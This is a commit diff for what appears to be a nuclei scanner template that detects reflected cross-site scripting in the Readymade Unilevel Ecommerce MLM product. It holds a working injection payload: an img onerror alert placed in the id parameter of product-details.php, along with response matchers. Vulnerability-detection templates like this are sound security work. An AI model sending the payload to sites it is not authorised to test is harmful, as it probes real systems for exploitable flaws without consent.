updated payload

projectdiscovery · Aug 20, 2024 · ba9487f · ba9487f
1 parent e2000e9
commit ba9487f
Showing 1 changed file with 5 additions and 6 deletions.
diff --git a/http/vulnerabilities/other/readymade-unilevel-xss.yaml b/http/vulnerabilities/other/readymade-unilevel-xss.yaml
@@ -1,7 +1,7 @@
 id: readymade-unilevel-xss
 
 info:
-  name: Readymade Unilevel Ecommerce MLM - XSS
+  name: Readymade Unilevel Ecommerce MLM - Cross-Site Scripting
   author: securityforeveryone
   severity: high
   description: |
@@ -11,22 +11,21 @@ info:
   metadata:
     vendor: i-netsolution
     product: readymade-unilevel-ecommerce
-  tags: packetstorm,ecommerce,readymade,xss
+  tags: ecommerce,readymade,xss
 
 variables:
   num1: "{{rand_int(1000, 9999)}}"
-  num2: "{{rand_int(1000, 9999)}}"
 
 http:
   - raw:
       - |
-        GET /product-details.php?id=1"><img/src/onerror=.1|alert`{{num1}}`+class={{num2}}> HTTP/1.1
+        GET /product-details.php?id=1"><img/src/onerror=.1|alert`{{num1}}`+class={{num1}}> HTTP/1.1
         Host: {{Hostname}}
 
     matchers:
       - type: dsl
         dsl:
-          - 'contains_all(body,"><img/src/onerror=.1|alert`{{num1}}` class={{num2}}>","user_login_id")'
-          - 'contains(content_type,"text/html")'
+          - 'contains_all(body, "><img/src/onerror=.1|alert`{{num1}}` class={{num1}}>", "user_login_id")'
+          - 'contains(content_type, "text/html")'
           - 'status_code == 200'
         condition: and